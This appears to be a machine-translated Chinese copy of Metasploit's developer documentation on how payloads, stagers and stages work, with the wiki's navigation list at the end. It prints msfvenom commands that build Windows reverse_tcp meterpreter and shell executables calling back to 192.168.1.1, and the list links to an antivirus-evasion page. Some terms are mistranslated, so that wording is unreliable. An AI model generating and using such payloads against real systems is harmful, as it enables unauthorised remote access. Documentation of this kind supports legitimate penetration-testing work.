# payloads 如何工作
payload模塊是儲存在`modules/payloads/{singles,stages,stagers}/<platform>`.當框架啟動時,stages和stagers結合起來創造一個完整的載荷.您可以在exploit中使用它。然后,handlers與有效載荷配對,以便框架知道如何創建與給定通信機制的會話。
有效載荷被賦予參考名稱,表示所有的部分,如下所示:
- Staged payloads: `<platform>/[arch]/<stage>/<stager>`
- Single payloads: `<platform>/[arch]/<single>`
這導致像有效載荷像 `windows/x64/meterpreter/reverse_tcp`.打破這一點,平臺是`windows`,架構是`x64`,最后階段我們交付的是`meterpreter`,而實現它的是`reverse_tcp`
請注意,體系結構是可選的,因為在某些情況下,它是不必要的或暗示的。一個例子是`php/meterpreter/reverse_tcp`。Arch不需要PHP有效載荷,因為我們提供的是解釋代碼,而不是本地代碼。
### singles
單一的有效載荷是難以忘懷的。他們可以與Metasploit建立溝通機制,但他們不需要。一個可能需要的場景的例子是當目標沒有網絡訪問時 - 通過USB密鑰傳遞的文件格式漏洞利用仍然是可能的。
### stagers
舞臺是一個小存根,旨在創造某種形式的交流,然后將執行轉移到下一個階段。使用stager解決了兩個問題。首先,它允許我們最初使用一個小的有效載荷來加載更多的功能更大的有效載荷。其次,它使通信機制與最后階段分離成為可能,因此一個有效載荷可以與多個傳輸一起使用而不需要復制代碼。
### stages
由于stagers會照顧到處理任何規模的限制,為我們分配一大塊內存來運行,所以stage可以是任意大的。這樣做的一個優點是能夠用C這樣的高級語言編寫最終階段的有效載荷。
## 交付階段
您希望有效載荷連接回的IP地址和端口被嵌入到stager中。如上所述,所有分級的有效載荷不過是建立通信并執行下一階段的小存根。當您使用分階段負載創建可執行文件時,您實際上只是創建了暫存器。所以下面的命令會創建功能相同的exe文件:
```
msfvenom -f exe LHOST=192.168.1.1 -p windows/meterpreter/reverse_tcp
msfvenom -f exe LHOST=192.168.1.1 -p windows/shell/reverse_tcp
msfvenom -f exe LHOST=192.168.1.1 -p windows/vncinject/reverse_tcp
```
(請注意,這些功能是相同的 - 有很多隨機化進入它,所以沒有兩個可執行文件是完全一樣的。)
1.Ruby端作為客戶端,使用由stager(例如:tcp,http,https)設置的任何傳輸機制。
* 在shell階段的情況下,當您與終端進行交互時,Metasploit會將遠程進程的輸入連接到您的終端。
* 在Meterpreter階段的情況下,Metasploit將開始使用Meterpreter協議。
- Home
- 開始使用
- 安裝metasploit開發環境
- 使用metasploit
- 使用git
- 報告一個bug
- 貢獻代碼
- 貢獻給metasploit
- 創建一個loginscans Metasploit模塊
- 接受模塊和增強功能的指導
- 常見的Metasploit模塊代碼錯誤
- 樣式提示
- metasploit提交者
- metasploit開發
- 為什么是ruby
- 樣式提示
- 如何開始寫一個exploit
- 如何開始寫一個輔助模塊
- 如何開始寫一個post模塊
- 如何開始寫一個Meterpreter腳本
- 載入外部模塊
- exploit rank
- Metasploit模塊引用標識符
- 怎么在你的exploit中確認window補丁程序級別
- 如何使用filedropper清理文件
- 如何棄用metasploit模塊
- 如何在模塊開發中報告或儲存數據
- 在metasploit如何使用日志
- 如何在metasploit對JavaScript進行混淆
- 如何解析一個http響應
- 如何使用HTTPClient發送HTTP請求
- 如何使用命令階段
- 如何使用數據儲存選項
- 如何在window后期開發中使用railgun
- 如何在exploit中使用powershell
- 如何使用PhpEXE來利用任意文件上傳漏洞
- 如何使用FILEFORMAT mixin創建一個文件格式exploit
- 如何使用BrowserExploitServer編寫一個瀏覽器exploit
- 如何使用HttpServer編寫瀏覽器exploit
- 如何編寫一個check()方法
- 如何使用Seh mixin來利用異常處理程序
- 如何在Windows上使用WbemExec進行寫入權限攻擊
- 如何使用httpserver和httpclient編寫一個模塊
- payloads如何工作
- 如何免殺
- 如何正確使用metasploit模塊